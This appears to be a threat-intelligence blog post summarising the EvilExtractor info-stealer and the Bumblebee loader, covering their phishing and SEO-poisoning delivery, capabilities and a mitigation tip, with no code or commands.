A new "All-in-One" stealer malware named EvilExtractor (also spelled Evil Extractor) is being marketed to other threat actors to steal data and files from Windows systems. It includes several modules that all work via an FTP service. The new stealer also contains environment checking and Anti-VM functions. Its primary purpose seems to be to steal browser data and information from compromised endpoints and then upload it to the attacker's FTP server."
The researchers said they observed a surge in attacks spreading the malware in March 2023, with most victims in Europe and the US. While marketed as an educational tool, EvilExtractor has been adopted by threat actors for use as an information stealer. The attack tool has been sold by a cyber threat actor named Kodex on cybercrime forums like Cracked since 22 October 2022. It is continually updated and includes various modules to siphon system metadata, passwords, and cookies from various web browsers, record keystrokes, and even act as ransomware by encrypting files on the target system.[1]
The malware is also said to have been part of a phishing email campaign detected on 30 March 2023. The emails lure recipients into launching an executable that masquerades as a PDF document under the pretext of confirming their "account details." The "Account_Info.exe" binary is a confusing Python program designed to launch a .NET loader that uses a Base64-encoded PowerShell script to launch EvilExtractor. Besides gathering files, the malware can also activate the webcam and capture screenshots.
EvilExtractor is a comprehensive info stealer with multiple malicious features, including ransomware. Its PowerShell script can elude detection in a .NET loader or PyArmor. Within a very short time, its developer has updated several functions and increased its stability. The findings come from a detailed malvertising and SEO poisoning campaign that delivered the Bumblebee malware loader via trojanized legitimate software installers.
Bumbleebee documented first about one year ago, is a modular loader primarily propagating through phishing techniques. Bumblebee, a new malware loader, was linked to several threat actors and high-profile ransomware operations. Specializing in stealth, Bumblebee was responsible for multiple cyberattacks. At the time, Bumblebee was still in active development, but the malware was determined to be an upgraded replacement for BazarLoader.
Additionally, the malware was observed to have elaborate evasion techniques, including complex anti-virtualization. Researchers found that the threat actors behind Bumbleebee are associated with Quantum, Conti, and MountLocker. Bumblebee has been hardened to become a highly sophisticated malware distributed via phishing email campaigns.
The use of SEO poisoning and malicious ads to redirect users searching for popular tools like ChatGPT, Cisco AnyConnect, Citrix Workspace, and Zoom to rogue websites hosting tainted installers has witnessed a spike in recent months after Microsoft began blocking macros by default from Office files downloaded from the internet.
In one incident described by investigators, the threat actor used the Bumblebee malware to obtain an entry point and move laterally after three hours to deploy Cobalt Strike and legitimate remote access software like AnyDesk and Dameware. The attack was ultimately disrupted before it proceeded to the final ransomware stage. Organizations should ensure that software installers and updates are only downloaded from known and trusted websites to mitigate this and similar threats.
Red Sky Alliance is a Cyber Threat Analysis and Intelligence Service organization. For questions, comments, or assistance, please get in touch with the office directly at 1-844-492-7225, or feedback@redskyalliance.com
Weekly Cyber Intelligence Briefings:
Reporting: https://www.redskyalliance.org/
Website: https://www.redskyalliance.com/
LinkedIn: https://www.linkedin.com/company/64265941
Weekly Cyber Intelligence Briefings:
REDSHORTS - Weekly Cyber Intelligence Briefings
https://attendee.gotowebinar.com/register/5504229295967742989
[1] https://thehackernews.com/2023/04/new-all-in-one-evilextractor-stealer.html
Comments